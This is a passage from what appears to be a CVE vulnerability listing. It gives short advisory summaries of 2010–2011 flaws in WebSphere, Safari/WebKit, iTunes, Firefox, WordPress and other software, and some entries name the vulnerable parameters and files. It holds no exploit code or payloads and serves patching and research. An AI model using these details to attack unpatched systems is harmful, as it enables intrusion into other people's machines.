Thin Client 7.0, allow remote attackers to execute arbitrary code via a long (1) InternationalOrder, (2) InternationalSeparator, or (3) LogFileName property value [CVE-2011-0316] The Administrative Console component in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.35 and 7.0 before 7.0.0.15 does not properly restrict access to console servlets, which allows remote attackers to obtain potentially sensitive status information via a direct request. [CVE-2011-0315] Cross-site scripting (XSS) vulnerability in the Servlet Engine / Web Container component in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.35 and 7.0 before 7.0.0.15 allows remote attackers to inject arbitrary web script or HTML via vectors related to the lack of an error page for an application. [CVE-2011-0314] Heap-based buffer overflow in IBM WebSphere MQ 6.0 before 6.0.2.11 and 7.0 before 7.0.1.5 allows remote authenticated users to execute arbitrary code or cause a denial of service (queue manager crash) by inserting an invalid message into the queue. [CVE-2011-0310] Buffer overflow in IBM WebSphere MQ 7.0 before 7.0.1.4 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted header field in a message. [CVE-2011-0286] Cross-site scripting (XSS) vulnerability in webdesktop/app in the BlackBerry Web Desktop Manager component in Research In Motion (RIM) BlackBerry Enterprise Server (BES) software before 5.0.2 MR5 and 5.0.3 before MR1, and BlackBerry Enterprise Server Express software 5.0.1 and 5.0.2, allows remote attackers to inject arbitrary web script or HTML via the displayErrorMessage parameter in a ManageDevices action. [CVE-2011-0280] Multiple cross-site scripting (XSS) vulnerabilities in HP Power Manager (HPPM) 4.3.2 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the logType parameter to Contents/exportlogs.asp, (2) the Id parameter to Contents/pagehelp.asp, or the (3) SORTORD or (4) SORTCOL parameter to Contents/applicationlogs.asp. NOTE: some of these details are obtained from third party information. [CVE-2011-0278] Unspecified vulnerability in HP Web Jetadmin 10.2 Service Release 3 and 4 allows local users to bypass intended access restrictions via unknown vectors. [CVE-2011-0274] Cross-site scripting (XSS) vulnerability in HP Business Availability Center (BAC) 7.x through 7.55 and 8.x through 8.05, and Business Service Management (BSM) through 9.01, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-0262] Buffer overflow in the stringToSeconds function in ovutil.dll in ovwebsnmpsrv.exe in HP OpenView Network Node Manager (OV NNM) 7.51 and 7.53 allows remote attackers to execute arbitrary code via large values of variables to jovgraph.exe. [CVE-2011-0255] WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1. [CVE-2011-0254] WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1. [CVE-2011-0253] WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1. [CVE-2011-0244] WebKit in Apple Safari before 5.0.6 allows user-assisted remote attackers to read arbitrary files via vectors related to improper canonicalization of URLs within RSS feeds. [CVE-2011-0242] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 5.0.6 allows remote attackers to inject arbitrary web script or HTML via vectors involving a URL that contains a username. [CVE-2011-0240] WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1. [CVE-2011-0238] WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1. [CVE-2011-0237] WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1. [CVE-2011-0235] WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1. [CVE-2011-0234] WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1. [CVE-2011-0233] WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1. [CVE-2011-0232] WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1. [CVE-2011-0231] CFNetwork in Apple Mac OS X before 10.7.2 does not properly follow an intended cookie-storage policy, which makes it easier for remote web servers to track users via a cookie, related to a "synchronization issue." [CVE-2011-0225] WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1. [CVE-2011-0223] WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1. [CVE-2011-0222] WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1. [CVE-2011-0221] WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1. [CVE-2011-0219] Apple Safari before 5.0.6 allows remote attackers to bypass the Same Origin Policy, and modify the rendering of text from arbitrary web sites, via a Java applet that loads fonts. [CVE-2011-0218] WebKit, as used in Apple Safari before 5.0.6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2011-07-20-1. [CVE-2011-0216] Off-by-one error in libxml in Apple Safari before 5.0.6 allows remote attackers to execute arbitrary code or cause a denial of service (heap-based buffer overflow and application crash) via a crafted web site. [CVE-2011-0214] CFNetwork in Apple Safari before 5.0.6 on Windows does not properly handle an untrusted attribute of a system root certificate, which allows remote web servers to bypass intended SSL restrictions via a certificate signed by a blacklisted certification authority. [CVE-2011-0195] The generate-id XPath function in libxslt in Apple iOS 4.3.x before 4.3.2 allows remote attackers to obtain potentially sensitive information about heap memory addresses via a crafted web site. NOTE: this may overlap CVE-2011-1202. [CVE-2011-0169] WebKit in Apple Safari before 5.0.4, when the Web Inspector is used, does not properly handle the window.console._inspectorCommandLineAPI property, which allows user-assisted remote attackers to bypass the Same Origin Policy and conduct cross-site scripting (XSS) attacks via a crafted web site. [CVE-2011-0168] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0167] The windows functionality in WebKit in Apple Safari before 5.0.4 allows remote attackers to bypass the Same Origin Policy, and force the upload of arbitrary local files from a client computer, via a crafted web site. [CVE-2011-0166] The HTML5 drag and drop functionality in WebKit in Apple Safari before 5.0.4 allows user-assisted remote attackers to bypass the Same Origin Policy and obtain sensitive information via vectors related to the dragging of content. NOTE: this might overlap CVE-2011-0778. [CVE-2011-0165] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0164] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0163] WebKit, as used in Apple Safari before 5.0.4 and iOS before 4.3, does not properly handle unspecified "cached resources," which allows remote attackers to cause a denial of service (resource unavailability) via a crafted web site that conducts a cache-poisoning attack. [CVE-2011-0161] WebKit, as used in Apple Safari before 5.0.4 and iOS before 4.3, does not properly handle the Attr.style accessor, which allows remote attackers to bypass the Same Origin Policy and inject Cascading Style Sheets (CSS) token sequences via a crafted web site. [CVE-2011-0160] WebKit, as used in Apple Safari before 5.0.4 and iOS before 4.3, does not properly handle redirects in conjunction with HTTP Basic Authentication, which might allow remote web servers to capture credentials by logging the Authorization HTTP header. [CVE-2011-0159] The Safari Settings feature in Safari in Apple iOS 4.x before 4.3 does not properly implement the clearing of cookies during execution of the Safari application, which might make it easier for remote web servers to track users by setting a cookie. [CVE-2011-0157] WebKit, as used in Apple iOS before 4.3, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-09-1. [CVE-2011-0156] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0155] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0154] WebKit, as used in Apple iTunes before 10.2 on Windows and Apple iOS, does not properly implement the .sort function for JavaScript arrays, which allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0153] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0152] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0151] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0150] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0149] WebKit, as used in Apple iTunes before 10.2 on Windows, does not properly parse HTML elements associated with document namespaces, which allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to a "dangling pointer" and iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0148] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0147] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0146] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0145] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0144] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0143] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0142] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0141] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0140] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0139] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0138] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0137] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0136] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0135] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0134] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0133] WebKit, as used in Apple iTunes before 10.2 on Windows, does not properly access glyph data during layout actions for floating blocks associated with pseudo-elements, which allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0132] Use-after-free vulnerability in the Runin box functionality in the Cascading Style Sheets (CSS) 2.1 Visual Formatting Model implementation in WebKit, as used in Apple iTunes before 10.2 on Windows and Apple Safari, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0131] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0130] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0129] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0128] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0127] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0126] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0125] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0124] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0123] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0122] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0121] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0120] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0119] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0118] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0117] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0116] Use-after-free vulnerability in the setOuterText method in the htmlelement library in WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to DOM manipulations during iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0115] The DOM level 2 implementation in WebKit, as used in Apple iTunes before 10.2 on Windows and Apple Safari, does not properly handle DOM manipulations associated with event listeners during processing of range objects, which allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0114] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0113] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0112] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0111] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0096] The MHTML protocol handler in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle a MIME format in a request for content blocks in a document, which allows remote attackers to conduct cross-site scripting (XSS) attacks via a crafted web site that is visited in Internet Explorer, aka "MHTML Mime-Formatted Request Vulnerability." [CVE-2011-0059] Cross-site request forgery (CSRF) vulnerability in Mozilla Firefox before 3.5.17 and 3.6.x before 3.6.14, and SeaMonkey before 2.0.12, allows remote attackers to hijack the authentication of arbitrary users for requests that were initiated by a plugin and received a 307 redirect to a page on a different web site. [CVE-2011-0057] Use-after-free vulnerability in the Web Workers implementation in Mozilla Firefox before 3.5.17 and 3.6.x before 3.6.14, and SeaMonkey before 2.0.12, allows remote attackers to execute arbitrary code via vectors related to a JavaScript Worker and garbage collection. [CVE-2011-0047] Cross-site scripting (XSS) vulnerability in MediaWiki before 1.16.2 allows remote attackers to inject arbitrary web script or HTML via crafted Cascading Style Sheets (CSS) comments, aka "CSS injection vulnerability." [CVE-2011-0031] The (1) JScript 5.8 and (2) VBScript 5.8 scripting engines in Microsoft Windows Server 2008 R2 and Windows 7 do not properly load decoded scripts obtained from web pages, which allows remote attackers to trigger memory corruption and consequently obtain sensitive information via a crafted web site, aka "Scripting Engines Information Disclosure Vulnerability." [CVE-2011-0005] Cross-site scripting (XSS) vulnerability in the com_search module for Joomla! 1.0.x through 1.0.15 allows remote attackers to inject arbitrary web script or HTML via the ordering parameter to index.php. [CVE-2011-0004] Multiple cross-site scripting (XSS) vulnerabilities in Piwik before 1.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-5287] SQL injection vulnerability in default.php in Cornerstone Technologies webConductor allows remote attackers to execute arbitrary SQL commands via the id parameter. [CVE-2010-5284] Multiple cross-site scripting (XSS) vulnerabilities in Collabtive 0.6.5 allow remote attackers to inject arbitrary web script or HTML via the (1) User parameter in the edit user profile feature to manageuser.php, (2) y parameter in a newcal action to manageajax.php, and the (3) pic parameter to thumb.php. [CVE-2010-5282] Multiple cross-site scripting (XSS) vulnerabilities in OpenText ECM (formerly Livelink ECM) 9.7.1 allow remote attackers to inject arbitrary web script or HTML via the (1) viewType and (2) sort parameters in a browse action to livelink/livelink [CVE-2010-5275] Cross-site scripting (XSS) vulnerability in memcache_admin in the Memcache module 5.x before 5.x-1.10 and 6.x before 6.x-1.6 for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-5247] Untrusted search path vulnerability in QtWeb Browser 3.3 build 043 allows local users to gain privileges via a Trojan horse wintab32.dll file in the current working directory, as demonstrated by a directory that contains a .html, .htm, or .mhtml file. NOTE: some of these details are obtained from third party information. [CVE-2010-5192] Cross-site scripting (XSS) vulnerability in the Java Management Console in Blue Coat ProxySG before SGOS 4.3.4.1, 5.x before SGOS 5.4.5.1, 5.5 before SGOS 5.5.4.1, and 6.x before SGOS 6.1.1.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-5183] DISPUTED Race condition in Webroot Internet Security Essentials 6.1.0.145 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5159] DISPUTED Race condition in Dr.Web Security Space Pro 6.0.0.03100 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute. [CVE-2010-5149] Websense Web Security and Web Filter before 6.3.3 Hotfix 27 and 7.x before 7.1.1 allow remote attackers to cause a denial of service (Blue Coat appliance integration outage) via a long URL. [CVE-2010-5148] Websense Web Security and Web Filter before 7.1 Hotfix 21 do not set the secure flag for the Encrypted Session (SSL) cookie in an https session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an http session. [CVE-2010-5147] The Remote Filtering component in Websense Web Security and Web Filter before 6.3.3 Hotfix 18 and 7.x before 7.1.1 allows remote attackers to cause a denial of service (daemon exit) via a large volume of traffic. [CVE-2010-5146] The Remote Filtering component in Websense Web Security and Web Filter before 7.1 Hotfix 66 allows local users to bypass filtering by (1) renaming the WDC.exe file or (2) deleting driver files. [CVE-2010-5145] The Filtering Service in Websense Web Security and Web Filter before 6.3.1 Hotfix 136 and 7.x before 7.1.1 on Windows allows remote attackers to cause a denial of service (filtering outage) via a crafted sequence of characters in a URI. [CVE-2010-5144] The ISAPI Filter plug-in in Websense Enterprise, Websense Web Security, and Websense Web Filter 6.3.3 and earlier, when used in conjunction with a Microsoft ISA or Microsoft Forefront TMG server, allows remote attackers to bypass intended filtering and monitoring activities for web traffic via an HTTP Via header. [CVE-2010-5106] The XML-RPC remote publishing interface in xmlrpc.php in WordPress before 3.0.3 does not properly check capabilities, which allows remote authenticated users to bypass intended access restrictions, and publish, edit, or delete posts, by leveraging the Author or Contributor role. [CVE-2010-5100] Multiple cross-site scripting (XSS) vulnerabilities in the Install Tool in TYPO3 4.2.x before 4.2.16, 4.3.x before 4.3.9, and 4.4.x before 4.4.5 allow remote authenticated users to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-5098] Cross-site scripting (XSS) vulnerability in the FORM content object in TYPO3 4.2.x before 4.2.16, 4.3.x before 4.3.9, and 4.4.x before 4.4.5, allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-5097] Cross-site scripting (XSS) vulnerability in the click enlarge functionality in TYPO3 4.3.x before 4.3.9 and 4.4.x before 4.4.5 when the caching framework is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-5095] Cross-site scripting (XSS) vulnerability in SilverStripe 2.3.x before 2.3.6 allows remote attackers to inject arbitrary web script or HTML via vectors related to DataObjectSet pagination. [CVE-2010-5083] SQL injection vulnerability in the Web_Links module for PHP-Nuke 8.0 allows remote attackers to execute arbitrary SQL commands via the url parameter in an Add action to modules.php. [CVE-2010-5078] SilverStripe 2.3.x before 2.3.10 and 2.4.x before 2.4.4 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain version information via a direct request to (1) apphire/silverstripe_version or (2) cms/silverstripe_version. [CVE-2010-5074] The layout engine in Mozilla Firefox before 4.0, Thunderbird before 3.3, and SeaMonkey before 2.1 executes different code for visited and unvisited links during the processing of Cascading Style Sheets (CSS) token sequences, which makes it easier for remote attackers to obtain sensitive information about visited web pages via a timing attack. [CVE-2010-5073] The JavaScript implementation in Google Chrome 4 does not properly restrict the set of values contained in the object returned by the getComputedStyle method, which allows remote attackers to obtain sensitive information about visited web pages by calling this method. NOTE: this may overlap CVE-2010-5070. [CVE-2010-5072] The JavaScript implementation in Opera 10.5 does not properly restrict the set of values contained in the object returned by the getComputedStyle method, which allows remote attackers to obtain sensitive information about visited web pages by calling this method. [CVE-2010-5071] The JavaScript implementation in Microsoft Internet Explorer 8.0 and earlier does not properly restrict the set of values contained in the object returned by the getComputedStyle method, which allows remote attackers to obtain sensitive information about visited web pages by calling this method. [CVE-2010-5070] The JavaScript implementation in Apple Safari 4 does not properly restrict the set of values contained in the object returned by the getComputedStyle method, which allows remote attackers to obtain sensitive information about visited web pages by calling this method, a different vulnerability than CVE-2010-2264. NOTE: this may overlap CVE-2010-5073. [CVE-2010-5069] The Cascading Style Sheets (CSS) implementation in Google Chrome 4 does not properly handle the :visited pseudo-class, which allows remote attackers to obtain sensitive information about visited web pages via a crafted HTML document. NOTE: this may overlap CVE-2010-2264. [CVE-2010-5068] The Cascading Style Sheets (CSS) implementation in Opera 10.5 does not properly handle the :visited pseudo-class, which allows remote attackers to obtain sensitive information about visited web pages via a crafted HTML document, a related issue to CVE-2010-2264. [CVE-2010-5064] Multiple cross-site scripting (XSS) vulnerabilities in Virtual War (aka VWar) 1.6.1 R2 allow remote attackers to inject arbitrary web script or HTML via (1) the Additional Information field to challenge.php, the (2) Additional Information or (3) Contact information field to joinus.php, (4) the War Report field to admin/admin.php in a finishwar action, or (5) the Nick field to profile.php. [CVE-2010-5054] Cross-site scripting 